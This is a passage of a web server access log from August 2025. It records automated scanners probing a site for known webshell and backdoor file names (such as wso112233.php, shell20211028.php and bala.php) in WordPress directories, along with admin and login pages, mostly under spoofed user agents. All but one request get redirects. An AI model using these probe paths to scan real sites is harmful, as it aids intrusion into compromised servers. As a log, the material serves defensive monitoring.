Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:06:04 -0400] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:06:09 -0400] "GET /wp-content/plugins/seoplugins/db.php?u HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 146.190.11.185 - - [12/Aug/2025:19:06:37 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:19:06:37 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:19:06:37 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:19:06:38 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:19:07:11 -0400] "GET /administrator/ HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:07:35 -0400] "GET /administrator/ HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:07:52 -0400] "GET /wp-includes/SimplePie/index.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:08:00 -0400] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:08:48 -0400] "GET /wp-content/plugins/ HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:09:35 -0400] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 274 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:09:39 -0400] "GET /wp-content/plugins/anttt/simple.php HTTP/1.1" 301 270 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:09:48 -0400] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:11:00 -0400] "GET /wp-content/themes/gaukingo/db.php?u HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:11:09 -0400] "GET /chosen.php?p= HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:11:33 -0400] "GET /wp-includes/SimplePie/file.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:12:32 -0400] "GET /wp-content/plugins/wp-help/ HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:12:35 -0400] "GET /wp-content/plugins/seoplugins/db.php?u HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:13:19 -0400] "GET /admin/index.php HTTP/1.1" 301 250 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:13:47 -0400] "GET /admin/index.php HTTP/1.1" 301 250 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 86.8.204.43 - - [12/Aug/2025:19:14:04 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:19:14:04 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:19:14:04 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:19:14:04 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:19:15:21 -0400] "GET /wp-content/plugins/wordpresss3cll/up.php HTTP/1.1" 301 275 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:15:30 -0400] "GET /wp-content/uploads/ HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:15:58 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:19:16:18 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:19:16:18 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:19:16:18 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:19:16:18 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:19:16:41 -0400] "GET /.well-known/wso112233.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:16:55 -0400] "GET /wso112233.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:17:02 -0400] "GET /.well-knownold/wso112233.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:17:14 -0400] "GET /.well-known/acme-challenge/wso112233.php HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:17:27 -0400] "GET /.well-known/pkivalidation/wso112233.php HTTP/1.1" 301 274 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:17:37 -0400] "GET /wp-content/plugins/wso112233.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:17:40 -0400] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:17:46 -0400] "GET /wp-content/plugins/beast3x/3xup.php HTTP/1.1" 301 270 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:19:18:05 -0400] "GET /wp-content/uploads/wso112233.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:18:27 -0400] "GET /wp-content/wso112233.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:18:30 -0400] "GET /wp-includes/wso112233.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:18:33 -0400] "GET /wp-admin/wso112233.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:18:38 -0400] "GET /wp-content/themes/wso112233.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:18:55 -0400] "GET /wp-content/uploads/2023/ HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:18:55 -0400] "GET /.well-known/shell20211028.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:19:04 -0400] "GET /shell20211028.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 43.135.142.37 - - [12/Aug/2025:19:19:15 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:19:19:20 -0400] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 301 274 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:19:24 -0400] "GET /.well-knownold/shell20211028.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:19:26 -0400] "GET /M1.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:19:32 -0400] "GET /.well-known/acme-challenge/shell20211028.php HTTP/1.1" 301 279 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:19:46 -0400] "GET /.well-known/pkivalidation/shell20211028.php HTTP/1.1" 301 278 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:20:07 -0400] "GET /wp-content/plugins/shell20211028.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:20:15 -0400] "GET /wp-login.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:20:33 -0400] "GET /wp-content/uploads/shell20211028.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:20:40 -0400] "GET /wp-content/shell20211028.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:20:46 -0400] "GET /wp-login.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:20:46 -0400] "GET /wp-content/themes/gaukingo/db.php?u HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:21:43 -0400] "GET /wp-includes/shell20211028.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:21:54 -0400] "GET /wp-admin/shell20211028.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:21:55 -0400] "GET /wp-includes/Requests/Text/ HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:21:57 -0400] "GET /wp-content/themes/shell20211028.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:22:16 -0400] "GET /.well-known/bala.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:22:22 -0400] "GET /bala.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:22:32 -0400] "GET /.well-knownold/bala.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:22:34 -0400] "GET /.well-known/acme-challenge/bala.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:22:38 -0400] "GET /wp-content/plugins/seoplugins/db.php?u HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:22:47 -0400] "GET /.well-known/pkivalidation/bala.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:22:52 -0400] "GET /.well-known/pki-validation/atomlib.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:23:01 -0400] "GET /wp-content/plugins/bala.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:23:16 -0400] "GET /wp-content/uploads/bala.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:23:19 -0400] "GET /wp-content/bala.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:23:43 -0400] "GET /wp-includes/bala.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:23:46 -0400] "GET /wp-admin/bala.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:23:53 -0400] "GET /wp-content/themes/bala.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:24:06 -0400] "GET /dropdown.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:24:11 -0400] "GET /wp-content/dropdown.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:24:20 -0400] "GET /wp-includes/dropdown.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:24:26 -0400] "GET /wp-includes/SimplePie/ HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:24:27 -0400] "GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:24:36 -0400] "GET /wp-admin/dropdown.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:26:56 -0400] "GET /wp-includes/Requests/atomlib.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:19:27:07 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:19:27:07 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:19:27:07 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:19:27:08 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:19:29:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:19:29:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:19:29:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:19:29:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:19:29:43 -0400] "GET /.well-known/acme-challenge/atomlib.php HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 86.8.204.43 - - [12/Aug/2025:19:30:03 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - 